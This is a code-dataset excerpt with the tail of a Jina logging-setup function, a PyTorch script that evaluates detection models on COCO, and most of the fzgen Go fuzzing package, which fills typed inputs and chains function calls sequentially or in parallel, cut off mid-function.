elif h == 'FileHandler':
handler = logging.FileHandler(cfg['output'].format_map(kwargs), delay=True)
handler.setFormatter(fmt(cfg['format'].format_map(kwargs)))
elif h == 'FluentHandler':
from ..importer import ImportExtensions
with ImportExtensions(required=False, verbose=False):
from fluent import asynchandler as fluentasynchandler
from fluent.handler import FluentRecordFormatter
handler = fluentasynchandler.FluentHandler(cfg['tag'],
host=cfg['host'],
port=cfg['port'], queue_circular=True)
cfg['format'].update(kwargs)
fmt = FluentRecordFormatter(cfg['format'])
handler.setFormatter(fmt)
if handler:
self.logger.addHandler(handler)
verbose_level = LogVerbosity.from_string(config['level'])
if 'JINA_LOG_LEVEL' in os.environ:
verbose_level = LogVerbosity.from_string(os.environ['JINA_LOG_LEVEL'])
self.logger.setLevel(verbose_level.value)
|
[] |
[] |
[
"JINA_LOG_LEVEL",
"JINA_LOG_WORKSPACE",
"JINA_LOG_ID",
"JINA_POD_NAME",
"JINA_LOG_CONFIG"
] |
[]
|
["JINA_LOG_LEVEL", "JINA_LOG_WORKSPACE", "JINA_LOG_ID", "JINA_POD_NAME", "JINA_LOG_CONFIG"]
|
python
| 5 | 0 | |
public/test_scripts/test_on_coco.py
|
import time
import random
import argparse
import json
import os
import sys
import warnings
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(BASE_DIR)
warnings.filterwarnings('ignore')
from tqdm import tqdm
from thop import profile
from thop import clever_format
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from public.path import COCO2017_path
from public.detection.dataset.cocodataset import Collater
from public.detection.models.retinanet import RetinaNet
from public.detection.models.fcos import FCOS
from public.detection.models.centernet import CenterNet
from public.detection.models.yolov3 import YOLOV3
from public.detection.models.decode import RetinaDecoder, FCOSDecoder, CenterNetDecoder, YOLOV3Decoder
from public.detection.dataset.cocodataset import CocoDetection, Normalize, Resize
from pycocotools.cocoeval import COCOeval
def _retinanet(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = RetinaNet(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def _fcos(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = FCOS(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def _centernet(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = CenterNet(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def _yolov3(arch, use_pretrained_model, pretrained_model_path, num_classes):
model = YOLOV3(arch, num_classes=num_classes)
if use_pretrained_model:
pretrained_models = torch.load(pretrained_model_path,
map_location=torch.device('cpu'))
# only load state_dict()
model.load_state_dict(pretrained_models, strict=False)
return model
def validate(val_dataset, model, decoder, args):
if args.use_gpu:
model = model.module
# switch to evaluate mode
model.eval()
with torch.no_grad():
all_eval_result = evaluate_coco(val_dataset, model, decoder, args)
return all_eval_result
def evaluate_coco(val_dataset, model, decoder, args):
results, image_ids = [], []
indexes = []
for index in range(len(val_dataset)):
indexes.append(index)
eval_collater = Collater()
val_loader = DataLoader(val_dataset,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.num_workers,
collate_fn=eval_collater.next)
start_time = time.time()
for i, data in tqdm(enumerate(val_loader)):
images, scales = torch.tensor(data['img']), torch.tensor(data['scale'])
per_batch_indexes = indexes[i * args.batch_size:(i + 1) *
args.batch_size]
if args.use_gpu:
images = images.cuda().float()
else:
images = images.float()
if args.detector == "retinanet":
cls_heads, reg_heads, batch_anchors = model(images)
scores, classes, boxes = decoder(cls_heads, reg_heads,
batch_anchors)
elif args.detector == "fcos":
cls_heads, reg_heads, center_heads, batch_positions = model(images)
scores, classes, boxes = decoder(cls_heads, reg_heads,
center_heads, batch_positions)
elif args.detector == "centernet":
heatmap_output, offset_output, wh_output = model(images)
scores, classes, boxes = decoder(heatmap_output, offset_output,
wh_output)
elif args.detector == "yolov3":
obj_heads, reg_heads, cls_heads, batch_anchors = model(images)
scores, classes, boxes = decoder(obj_heads, reg_heads, cls_heads,
batch_anchors)
scores, classes, boxes = scores.cpu(), classes.cpu(), boxes.cpu()
scales = scales.unsqueeze(-1).unsqueeze(-1)
boxes /= scales
for per_image_scores, per_image_classes, per_image_boxes, index in zip(
scores, classes, boxes, per_batch_indexes):
# for coco_eval,we need [x_min,y_min,w,h] format pred boxes
per_image_boxes[:, 2:] -= per_image_boxes[:, :2]
for object_score, object_class, object_box in zip(
per_image_scores, per_image_classes, per_image_boxes):
object_score = float(object_score)
object_class = int(object_class)
object_box = object_box.tolist()
if object_class == -1:
break
image_result = {
'image_id':
val_dataset.image_ids[index],
'category_id':
val_dataset.find_category_id_from_coco_label(object_class),
'score':
object_score,
'bbox':
object_box,
}
results.append(image_result)
image_ids.append(val_dataset.image_ids[index])
print('{}/{}'.format(index, len(val_dataset)), end='\r')
testing_time = (time.time() - start_time)
per_image_testing_time = testing_time / len(val_dataset)
print(f"per_image_testing_time:{per_image_testing_time:.3f}")
if not len(results):
print(f"No target detected in test set images")
return
json.dump(results,
open('{}_bbox_results.json'.format(val_dataset.set_name), 'w'),
indent=4)
# load results in COCO evaluation tool
coco_true = val_dataset.coco
coco_pred = coco_true.loadRes('{}_bbox_results.json'.format(
val_dataset.set_name))
coco_eval = COCOeval(coco_true, coco_pred, 'bbox')
coco_eval.params.imgIds = image_ids
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
all_eval_result = coco_eval.stats
return all_eval_result
def test_model(args):
print(args)
if args.use_gpu:
# use one Graphics card to test
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
if not torch.cuda.is_available():
raise Exception("need gpu to test network!")
torch.cuda.empty_cache()
if args.seed is not None:
random.seed(args.seed)
if args.use_gpu:
torch.cuda.manual_seed_all(args.seed)
cudnn.deterministic = True
if args.use_gpu:
cudnn.benchmark = True
cudnn.enabled = True
coco_val_dataset = CocoDetection(
image_root_dir=os.path.join(COCO2017_path, 'images/val2017'),
annotation_root_dir=os.path.join(COCO2017_path, 'annotations'),
set="val2017",
transform=transforms.Compose([
Normalize(),
Resize(resize=args.input_image_size),
]))
if args.detector == "retinanet":
model = _retinanet(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = RetinaDecoder(image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
elif args.detector == "fcos":
model = _fcos(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = FCOSDecoder(image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
elif args.detector == "centernet":
model = _centernet(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = CenterNetDecoder(
image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
elif args.detector == "yolov3":
model = _yolov3(args.backbone, args.use_pretrained_model,
args.pretrained_model_path, args.num_classes)
decoder = YOLOV3Decoder(image_w=args.input_image_size,
image_h=args.input_image_size,
min_score_threshold=args.min_score_threshold)
else:
print("unsupport detection model!")
return
flops_input = torch.randn(1, 3, args.input_image_size,
args.input_image_size)
flops, params = profile(model, inputs=(flops_input, ))
flops, params = clever_format([flops, params], "%.3f")
print(
f"backbone:{args.backbone},detector: '{args.detector}', flops: {flops}, params: {params}"
)
if args.use_gpu:
model = model.cuda()
decoder = decoder.cuda()
model = nn.DataParallel(model)
print(f"start eval.")
all_eval_result = validate(coco_val_dataset, model, decoder, args)
print(f"eval done.")
if all_eval_result is not None:
print(
f"val: backbone: {args.backbone}, detector: {args.detector}, IoU=0.5:0.95,area=all,maxDets=100,mAP:{all_eval_result[0]:.3f}, IoU=0.5,area=all,maxDets=100,mAP:{all_eval_result[1]:.3f}, IoU=0.75,area=all,maxDets=100,mAP:{all_eval_result[2]:.3f}, IoU=0.5:0.95,area=small,maxDets=100,mAP:{all_eval_result[3]:.3f}, IoU=0.5:0.95,area=medium,maxDets=100,mAP:{all_eval_result[4]:.3f}, IoU=0.5:0.95,area=large,maxDets=100,mAP:{all_eval_result[5]:.3f}, IoU=0.5:0.95,area=all,maxDets=1,mAR:{all_eval_result[6]:.3f}, IoU=0.5:0.95,area=all,maxDets=10,mAR:{all_eval_result[7]:.3f}, IoU=0.5:0.95,area=all,maxDets=100,mAR:{all_eval_result[8]:.3f}, IoU=0.5:0.95,area=small,maxDets=100,mAR:{all_eval_result[9]:.3f}, IoU=0.5:0.95,area=medium,maxDets=100,mAR:{all_eval_result[10]:.3f}, IoU=0.5:0.95,area=large,maxDets=100,mAR:{all_eval_result[11]:.3f}"
)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='PyTorch COCO Detection Testing')
parser.add_argument('--backbone', type=str, help='name of backbone')
parser.add_argument('--detector', type=str, help='name of detector')
parser.add_argument('--batch_size',
type=int,
default=1,
help='inference batch size')
parser.add_argument('--num_workers',
type=int,
default=1,
help='num workers')
parser.add_argument('--num_classes',
type=int,
default=80,
help='model class num')
parser.add_argument('--min_score_threshold',
type=float,
default=0.05,
help='min score threshold')
parser.add_argument("--use_pretrained_model",
action="store_true",
help="use pretrained model or not")
parser.add_argument('--pretrained_model_path',
type=str,
help='pretrained model path')
parser.add_argument("--use_gpu",
action="store_true",
help="use gpu to test or not")
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--input_image_size',
type=int,
default=667,
help='input image size')
args = parser.parse_args()
test_model(args)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
fuzzer/fuzzer.go
|
// Package fuzzer supports fuzzing rich signatures via the Fill method, as well as
// the ability to automatically chain Steps together under
// the control of the fuzzer using the Chain method.
//
// Package fuzzer can be used completely independently from the fzgen command
// by manually constructing fuzzing functions, or the fzgen command can
// be used to automatically create wrappers that use package fuzzer.
//
// See the project README for additional information:
// https://github.com/thepudds/fzgen
package fuzzer
import (
"bytes"
"fmt"
"os"
"reflect"
"runtime"
"strconv"
"strings"
"sync"
"github.com/sanity-io/litter"
"github.com/thepudds/fzgen/fuzzer/internal/plan"
"github.com/thepudds/fzgen/fuzzer/internal/randparam"
)
// SupportedInterfaces enumerates interfaces that can be filled by Fill(&obj).
var SupportedInterfaces = randparam.SupportedInterfaces
// Step describes an operation to step the system forward.
// Func can take any number of arguments and return any number of values.
// The Name string conventionally should be an acceptable func identifier.
// See Chain for more details on usage.
type Step struct {
Name string
Func interface{}
}
// Fuzzer is a utility object that can fill in many types
// such as io.Reader, structs, maps, and so on, as well as supports chaining over a set of
// functions in sequence, including connecting output to inputs
// and re-using inputs (e.g., to help exercise APIs like a Store followed
// by a Load).
// Conventially called 'fz'.
type Fuzzer struct {
data []byte
randparamFuzzer *randparam.Fuzzer
execState *execState
chainOpts chainOpts
}
type FuzzerOpt func(*Fuzzer) error
// NewFuzzer returns a Fuzzer, which relies on the input data []byte
// to control its subsequent operations.
// In the future, NewFuzzer may take options, though currently does not.
func NewFuzzer(data []byte, options ...FuzzerOpt) (fz *Fuzzer) {
fill := randparam.NewFuzzer(data)
state := &execState{
reusableInputs: make(map[reflect.Type][]*reflect.Value),
outputSlots: make(map[reflect.Type][]*outputSlot),
// TODO: not needed?
// reusableOutputs: make(map[reflect.Type][]reflect.Value),
}
return &Fuzzer{
data: data,
randparamFuzzer: fill,
execState: state,
}
}
// Fill fills in most simple types, maps, slices, arrays, and recursively fills any public members of x.
// It supports about 20 or so common interfaces, such as io.Reader, io.Writer, or io.ReadWriter.
// See SupportedInterfaces for current list of supported interfaces.
// Callers pass in a pointer to the object to fill, such as:
// var i int
// Fill(&i)
// var r io.Reader
// Fill(&r)
// var s1, s2 string
// Fill(&s1, &s2)
// Fill ignores channels, func pointers, complex64, complex128, and uintptr,
// For number, string, and []byte types, it tries to populate the obj value with literals found in the initial input []byte.
//
// In order to maximize deterministic behavior, help guide the fuzzing engine, and allow for generation of reproducers,
// Fill must not be called from within the Steps used with Chain. If you need additional values within a Step, add
// them as parameters to the Step, and Chain will fill those parameters.
func (fz *Fuzzer) Fill(x ...interface{}) {
// TODO: probably panic if called from within Chain.
for _, arg := range x {
before := fz.randparamFuzzer.Remaining()
fz.randparamFuzzer.Fill(arg)
if debugPrintPlan {
fmt.Printf("fzgen: filled object of type \"%T\" using %d bytes. %d bytes remaining.\n",
arg, before-fz.randparamFuzzer.Remaining(), fz.randparamFuzzer.Remaining())
}
}
}
type execState struct {
// reusableInputs is a map from type to list of all new args of that type from all steps,
// ordered by the sequence of calls defined the Plan and the order within the args of a
// given Call from the plan.
// Each entry in the map is a slice of the filled-in reflect.Values for that reflect.Type
// for each argument in the plan that is defined to be a new value (and not a reused input or output).
// For example, if the plan is effectively:
// call1(a, b string)
// call2(c int, d string)
// then the map entry for key of reflect.Type string would be {a, b, d} as long as a, b, and d are defined
// by the plan to be new values. On the other hand, if the plan defines d to reuse a's input value,
// then the map entry for key of reflect.Type string would be {a, b}, without d.
reusableInputs map[reflect.Type][]*reflect.Value
// outputSlots is map from type to return value slots, covering the complete set of return types in all calls in the plan,
// and ordered by the sequence of calls defined the Plan and the order of the return values of a
// given Call from the plan.
// It is used as an intermediate step prior to actually invoking any calls
// to determine which if any return values should be saved when it is time to invoke a specific call.
// TODO: we probably could collapse outputSlots and reusableOutputs.
outputSlots map[reflect.Type][]*outputSlot
// reusableOutputs is a map of from type to list of all return values that will be used as later inputs.
// It is similar in spirit to reusableInputs, but whereas reusableInputs contains all new input values,
// reusableOutputs only contains returns values that are planned to be reused by a subsequent call.
// For example, if the plan is effectively:
// call1() int
// call2(a int)
// and the plan defines that call2 will attempt to reuse an int return value as its input arg,
// then the map entry for key of reflect.Type int would be effectively be {{call1RetVal0}},
// where call2 will use the zeroth return value from call1 as the input to call2.
// After we invoke call1, we fill in the reflect.Value in the right slot of the slice.
// When we later invoke call2, we read that value.
// Note that we set up the slice (with invalid reflect.Values) before any concurrent goroutines run,
// and then take care to read the reflect.Value (e.g., to invoke call2) only after it has been
// filled in (e.g., after the invocation of call1).
// TODO: not needed?
// reusableOutputs map[reflect.Type][]reflect.Value
}
// execCall represents a function call we intend to make, based on which
// fuzzer.Step func was selected in our Plan.
type execCall struct {
planCall plan.Call // raw plan.Call filled in by fz.Fill
name string
index int // zero-based index of this call. currently only used for emitting variable name for repro.
fv reflect.Value // func we will call.
args []argument // arguments for this call, some of which might initially be placeholder invalid reflect.Value.
outputSlots []*outputSlot // pointers to the output slots for this call's return values.
}
type argument struct {
useReturnVal bool // indicates if this argument will come from another call's return value.
typ reflect.Type // type of input argument.
val *reflect.Value // argument value to use.
slot *outputSlot // slot of the return value.
}
type outputSlot struct {
// Indicates if this return value will be used by a subsequent call. If false,
// we don't store the value after the corresponding call completes.
needed bool
// Type of return value.
typ reflect.Type
// Return value to use. Initially set to invalid reflect.Value{}, which is filled
// in after the corresponding call completes.
val reflect.Value
// Channel to broadcast via close(ch) that the return value val is ready to be read.
ch chan struct{}
// zero-indexed call that the return value will come from.
returnValCall int
// zero-indexed arg from that call that the return value will come from.
returnValArg int
}
type ChainOpt func(*Fuzzer) error
type chainOpts struct {
parallel bool
}
// ChainParallel indicates the Fuzzer is allowed to run the
// defined set of Steps in parallel. The Fuzzer can choose to run
// all selected Steps in parallel, though most often prefers
// to run only a portion of Steps in parallel in a single
// Chain execution in order to increase deterministic behavior
// and help the underlying fuzzing engine evolve interesting inputs.
// Care is taken so that a given corpus will result in the same
// Steps executing with the same arguments regardless of
// whether or not ChainParallel is set.
//
// ChainParallel is most often useful with the race detector, such as
// 'go test -fuzz=. -race', though because the race detector
// can have 10x-20x performance impact, one approach is to
// run for a period of time with ChainParallel set but
// without the race detector to build up a larger corpus faster,
// and then later run with the race detector enabled.
func ChainParallel(fz *Fuzzer) error {
fz.chainOpts.parallel = true
return nil
}
// Chain invokes a set of Steps, looking for problematic sequences and input arguments.
// The Fuzzer chooses which Steps to calls and how often to call them,
// then creates any needed arguments, and calls the Steps in a sequence selected by the fuzzer.
// The only current option is ChainOptParallel.
// If the last return value of a Step is of type error and a non-nil value is returned,
// this indicates a sequence of Steps should stop execution,
// The only current option is ChainOptParallel.
func (fz *Fuzzer) Chain(steps []Step, options ...ChainOpt) {
// Start by filling in our plan, which will let us know the sequence of steps along
// with sources for input args (which might be re-using input args,
// or using return values, or new values from fz.Fill).
pl := plan.Plan{}
before := fz.randparamFuzzer.Remaining()
switch debugPlanVersion {
case 2:
// Current approach.
// Get any remaining bytes from randparamFuzzer.
data := fz.randparamFuzzer.Data()
buf := bytes.NewReader(data)
// Convert those bytes into a Plan.
pl = unmarshalPlan(buf, steps)
// Drain from randparamFuzzer any bytes we used building the Plan.
used := len(data) - buf.Len()
fz.randparamFuzzer.Drain(used)
default:
panic("unexpected debugPlanVersion")
}
if debugPrintPlan {
emitPlan(pl)
fmt.Printf("fzgen: filled Plan using %d bytes. %d bytes remaining.\n",
before-fz.randparamFuzzer.Remaining(), fz.randparamFuzzer.Remaining())
}
// Using functional options.
// (Side note: Rob Pike's blog introducing functional options is a great read:
// https://commandcenter.blogspot.com/2014/01/self-referential-functions-and-design.html)
for _, opt := range options {
// For a minor bit of improved call location backwards compat, skip any nil opts in case we have older generated code with a nil as
// second argument.
if opt == nil {
continue
}
err := opt(fz)
if err != nil {
// TODO: currently we have no errors. panic is probably the right way to communicate from inside a fuzz func.
panic(err)
}
}
fz.chain(steps, pl)
}
func (fz *Fuzzer) chain(steps []Step, pl plan.Plan) {
parallelAllowed := fz.chainOpts.parallel
// First, determine if we will spin and loop for any parallel calls.
allowSpin, loopCount := fz.calcParallelControl()
// Second, create our list of execCalls based on the list of plan.Calls.
// We do not yet fully populate the arguments for an execCall,
// which we will do on a subsequent pass.
execCalls := make([]execCall, len(pl.Calls))
for i := range pl.Calls {
// Based on the plan, compute index into the user's Step list.
s := int(pl.Calls[i].StepIndex) % len(steps)
ec := execCall{
planCall: pl.Calls[i],
name: steps[s].Name,
index: i,
fv: mustFunc(steps[s].Func),
args: []argument{}, // empty to start, we will fill in below.
}
execCalls[i] = ec
}
// Third, create arguments as needed for each execCall,
// or record that we will obtain an argument from the
// return value of an earlier execCall.
for i := range execCalls {
allowReturnValReuse := loopCount == 1
// Build arguments for this call, and also get its reflect.Value function.
// This can update the execCall to track outputSlots.
args := fz.prepareStep(&execCalls[i], allowReturnValReuse, fz.Fill)
// Track what we need to execute this call later.
execCalls[i].args = args
}
// TODO: consider reintroducing shuffle of plan or execCalls, though might have less benefit after interweaving filling args
// with filling the plan, which then gives the fuzzing engine a better chance of reordering.
// (We've tried a few different variations of rand-based shuffling of plan or execCalls, and not clear how helpful.
// If we shuffle, care must be taken around re-using input args (for example, could shuffle after that),
// as well as around re-using return values (for example, could shuffle before that is set up to avoid shuffling
// our way into a deadlock on the arg ready channel).
sequential := true
var startParallelIndex, stopParallelIndex int // inclusive range
var parallelPlan byte
// This is purposefully the last byte drawn (after the Plan and after our args have all been filled),
// including so that tail-trim minimization will elimanate this from our input data []byte
// If the byte was uniformaly random:
// 1/8 of time - serial
// 3/4 of time - parallel pair
// 1/8 of time - parallel for up to N from end
// However, if the byte in missing (e.g., tail trim minimization) it will be drawn
// as the zero value, which purposefully means serial here,
// and which means serial will be favored if the observed coverage or crash still happens serially.
// Also, we try to take advantage of ASCII '0' minimization behavior of cmd/go
// to mean serial, and then as cmd/go minimization steps to ASCII '1', '2', '3', ...,
// we interpret those to mean pair parallel, stepping from the end.
fz.Fill(¶llelPlan)
if parallelAllowed && len(execCalls) > 1 {
switch {
case parallelPlan == '0' || parallelPlan < 32:
sequential = true
case parallelPlan < 224:
startParallelIndex, stopParallelIndex = calcParallelPair(parallelPlan, len(execCalls))
sequential = false
default:
startParallelIndex, stopParallelIndex = calcParallelN(parallelPlan, len(execCalls))
sequential = false
}
}
if sequential {
// This only matters for debug output, but might as well make it clear.
allowSpin, loopCount = false, 1
}
if debugPrintPlan {
fmt.Printf("fzgen: parallelPlan byte: %v startParallelIndex: %d stopParallelIndex: %d sequential: %v\n",
parallelPlan, startParallelIndex, stopParallelIndex, sequential)
}
if debugPrintRepro {
if sequential {
fmt.Printf("PLANNED STEPS: (sequential: %v)\n\n", sequential)
} else {
fmt.Printf("PLANNED STEPS: (sequential: %v, loop count: %d, spin: %v)\n\n", sequential, loopCount, allowSpin)
}
emitBasicRepro(execCalls, sequential, startParallelIndex, stopParallelIndex)
}
// Invoke our chained calls!
if sequential {
for _, ec := range execCalls {
fz.callStep(ec)
}
} else {
var wg sync.WaitGroup
for i := range execCalls {
// Spin between parallel calls.
if allowSpin && i > startParallelIndex && i <= stopParallelIndex {
runtime.Gosched()
spin()
}
if i >= startParallelIndex && i <= stopParallelIndex {
// This is a call we will run in parallel.
wg.Add(1)
go func(i int) {
defer wg.Done()
for j := 0; j < loopCount; j++ {
fz.callStep(execCalls[i])
}
}(i)
if i == stopParallelIndex {
// Return to sequential execution, waiting on our in-flight goroutines
// we just started above.
wg.Wait()
}
} else {
// Everything outside of start/StopParallelIndex runs sequentially.
fz.callStep(execCalls[i])
}
}
}
}
// calcParallelControl draws and interprets bytes to control our spinning and looping.
func (fz *Fuzzer) calcParallelControl() (allowSpin bool, loopCount int) {
// TODO: probably move drawing the bytes to marshal.go.
// TODO: orderPlan is not currently implemented, but we reserve a byte.
// (Previously, we had a couple different flavors of randomized goroutine ordering
// via a seed byte, but that is disabled).
var spinPlan, loopPlan, orderPlan byte
fz.Fill(&spinPlan, &loopPlan, &orderPlan)
// We prefer to spin (mostly to aid with reproducibility), including if '0' or 0x0 appear during minimization.
// (And yes, '0' is less than 192, but being explicit here as reminder when the numbers get juggled).
allowSpin = spinPlan == '0' || loopPlan < 192
// We prefer to not to loop much (mostly for perf & mem usage), including if '0' or 0x0 appear during minimization.
switch {
case loopPlan == '0' || loopPlan < 128:
loopCount = 1
case loopPlan < 224:
loopCount = 4
case loopPlan < 250:
loopCount = 16
case loopPlan < 254:
loopCount = 64
default:
loopCount = 256
}
if loopCount >= 16 {
// Disable spin for larger loop counts.
// This is partly to help with performance, and more debatable,
// the types of concurrency bugs that benefit from a large loop count
// might tend to benefit from starting parallel loops at the same time without
// an artificial delay between starts.
allowSpin = false
}
return allowSpin, loopCount
}
// calcParallelPair interprets the bytes from our Plan to indicate when we
// should start and stop parallel execution for a pair of calls.
func calcParallelPair(parallelPlan byte, execCallLen int) (startParallelIndex, stopParallelIndex int) {
// startParallelIndex is index of the first exeCall of the pair to run in parallel.
// In general, we want to favor (1) sequential and (2) putting the parallelism as far towards the
// end of a call sequence as we can, including so that new coverage which might have
// been first *observed* with a logical race (e.g., two racing stores that are not a data race)
// is minimized down to sequential behavior when possible.
// We offset from '0' to take advantage of current cmd/go minimizing behavior
// of trying '0', then '1', then '2', ... for each byte when minimizing:
// '0' is handled above, which we want to mean serial
// '1' we handle here, which we want to mean the last and second-to-last are in parallel.
// '2' means second-to-last and third-to-last in parallel, and so on.
// We subtract 1 from the right-side mod operand because the last execCall would be a no-op as startParallelIndex,
// and hence there are only len(execCalls)-1 interesting values for startParallelIndex here.
offset := int(parallelPlan-'1') % (execCallLen - 1)
stopParallelIndex = execCallLen - 1 - offset
startParallelIndex = stopParallelIndex - 1
if startParallelIndex < 0 {
panic("bug computing startParallelIndex")
}
if stopParallelIndex >= execCallLen {
panic("bug computing stopParallelIndex")
}
return startParallelIndex, stopParallelIndex
}
// calcParallelN interprets the bytes from our Plan to indicate when we
// should start and stop parallel execution, which will be up to N calls in parallel from the end
// of the plan.
func calcParallelN(parallelPlan byte, execCallLen int) (startParallelIndex, stopParallelIndex int) {
offset := int(parallelPlan) % (execCallLen - 1)
startParallelIndex = execCallLen - 2 - offset
stopParallelIndex = execCallLen - 1
if startParallelIndex < 0 {
panic("bug computing startParallelIndex")
}
if stopParallelIndex >= execCallLen {
panic("bug computing stopParallelIndex")
}
return startParallelIndex, stopParallelIndex
}
func (fz *Fuzzer) callStep(ec execCall) []reflect.Value {
// TODO: don't need all these args eventually
for _, arg := range ec.args {
if arg.useReturnVal {
// Wait until the return value is ready to be read.
<-arg.slot.ch
}
}
// Prepare the reflect.Value arg list we will use to call the func.
// This contains the input values we previously created.
reflectArgs := []reflect.Value{}
for i := range ec.args {
v := *ec.args[i].val
// For map, pointer, or slice, we disallow nil values to
// be passed in as args by creating a new object here if nil. Note that we are not setting up
// for example a map completely -- just making sure it is not nil.
// In older versions, this arg nil check was emitted code someone could choose to delete.
// We could return and skip this call (closer to older emitted logic), but
// if we do that, we need to handle the outputslot broadcast channels for this call in case someone
// is waiting or will be waiting on a return value from this call.
// TODO: this is likely useful for Ptr, but less sure how useful this is for the other types here.
// TODO: test this better. inputs/race/race.go tests this for Ptr, but this is slightly annoying to test
// because fz.Fill avoids this. This occurs for example when the plan decides to reuse a call return
// value and that function under test returns a nil. In that case, fz.Fill is not the one creating the value.
// TODO: if we keep this, consider showing equivalent logic in the emitted repro logic, or maybe only when it matters.
// TODO: consider skipping this instead, and emit the nil check logic in the repro.
// TODO: make this configurable, including because people no longer have option of deleting the emitted nil checks.
switch v.Kind() {
case reflect.Ptr:
if v.IsNil() {
v = reflect.New(v.Type().Elem())
}
case reflect.Slice:
if v.IsNil() {
v = reflect.MakeSlice(v.Type(), 0, 0)
}
case reflect.Map:
if v.IsNil() {
v = reflect.MakeMapWithSize(v.Type(), 0)
}
case reflect.Interface:
// TODO: consider checking Interface too. Or better to keep passing the code under test a nil?
}
reflectArgs = append(reflectArgs, v)
}
// Call the user's func.
ret := ec.fv.Call(reflectArgs)
if len(ret) != ec.fv.Type().NumOut() {
panic("fzgen: mismatch on return value count")
}
if len(ret) != len(ec.outputSlots) {
panic(fmt.Sprintf("fzgen: for execCall %v, mismatch on return value count vs. execCall.outputSlots count: %+v, %+v", ec.name, ret, ec.outputSlots))
}
// Check to see if any of these return results are needed by an subsequent call.
if fz.execState != nil {
for i := 0; i < ec.fv.Type().NumOut(); i++ {
if ec.outputSlots[i].needed {
// at least one subsequent call will use this return value.
outV := ret[i]
// sanity check types match
outT := ec.fv.Type().Out(i)
if outT != outV.Type() || outT != ec.outputSlots[i].typ {
panic("fzgen: mismatch on return value types")
}
// store this return value in the right outputSlot for later use by a subsequent call.
slot := ec.outputSlots[i]
slot.val = outV
// Broadcast that the slot.val is ready to be read.
close(slot.ch)
}
}
}
// fmt.Println(ret)
// fmt.Printf("ret: %T %v\n", ret[0], ret[0])
return ret
}
func (fz *Fuzzer) prepareStep(ec *execCall, allowReturnValReuse bool, fillFunc func(...interface{})) []argument {
// TODO: additional sanity checking on types?
fv := ec.fv
ft := fv.Type()
// Build up a list of arguments that are filled in with fresh values, or via reusing prior values.
args := []argument{}
for i := 0; i < ft.NumIn(); i++ {
// Create or find an input value
var arg argument
inT := ft.In(i)
// Track if we will need to create a new arg via reflect.New (vs. reusing an input or output).
createNew := true
// Check if our plan indicates we should try to reuse an input or output.
if fz.execState != nil && len(ec.planCall.ArgSource) > i {
switch ec.planCall.ArgSource[i].SourceType % 3 {
case 0:
// Reuse an argument, if one can be found.
inputs, ok := fz.execState.reusableInputs[inT]
if ok && len(inputs) > 0 {
// TODO: take index from plan eventually; for simple tests, fine to take first
inV := inputs[0]
// We want the Elem() for use below in Call, because
// inV represents a pointer to the type we want (e.g. from reflect.New),
// so we do the indirect via inV.Elem() to get our original type.
inElem := inV.Elem()
arg = argument{
useReturnVal: false,
typ: inV.Type(),
val: &inElem,
}
createNew = false
}
case 1:
if allowReturnValReuse {
// Mark that we will use a return value from an earlier step, if one can be found.
outputSlots, ok := fz.execState.outputSlots[inT]
if ok && len(outputSlots) > 0 {
// We found a return value.
// TODO: BUG: Note that it could be from any step, including one which happens
// after us.
// TODO: take index from plan eventually; for simple tests, fine to take first
outputSlot := outputSlots[0]
outputSlot.needed = true
arg = argument{
useReturnVal: true,
typ: inT,
val: &outputSlot.val,
slot: outputSlot,
}
createNew = false
}
}
}
}
if createNew {
// Create a new instance.
// Note: NOT doing anything special if inT represent a pointer type (including not calling Elem here)
inV := reflect.New(inT)
// inInf is an interface with a pointer as its value, for example, *string if inT.Kind() is string
inIntf := inV.Interface()
// Do the work of filling in this value
fillFunc(inIntf)
inElem := inV.Elem()
arg = argument{
useReturnVal: false,
typ: inV.Type(),
val: &inElem,
}
if fz.execState != nil {
// This is a new arg, store for later.
// (A reused input arg would have already beeen stored for later use).
fz.execState.reusableInputs[arg.typ] = append(fz.execState.reusableInputs[arg.typ], arg.val)
// TODO: simple pop for now
if len(fz.execState.reusableInputs[arg.typ]) > 10 {
fz.execState.reusableInputs[arg.typ] = fz.execState.reusableInputs[arg.typ][1:]
}
}
}
// Add this now useful value to our list of input args for this call.
args = append(args, arg)
}
// Finally, add all of the return types for this call to our
// set of all known return value types for all of our steps seen so far.
// A later call might might use one of our return values as an input arg.
if fz.execState != nil {
for i := 0; i < fv.Type().NumOut(); i++ {
outT := fv.Type().Out(i)
slot := &outputSlot{
needed: false,
typ: outT,
val: reflect.Value{},
ch: make(chan struct{}),
returnValCall: ec.index,
returnValArg: i,
}
fz.execState.outputSlots[outT] = append(fz.execState.outputSlots[outT], slot)
// execCall.outputSlots is a slice containing slots for all return values for
// the call, with slice elements ordered by the return value order of the call.
ec.outputSlots = append(ec.outputSlots, slot)
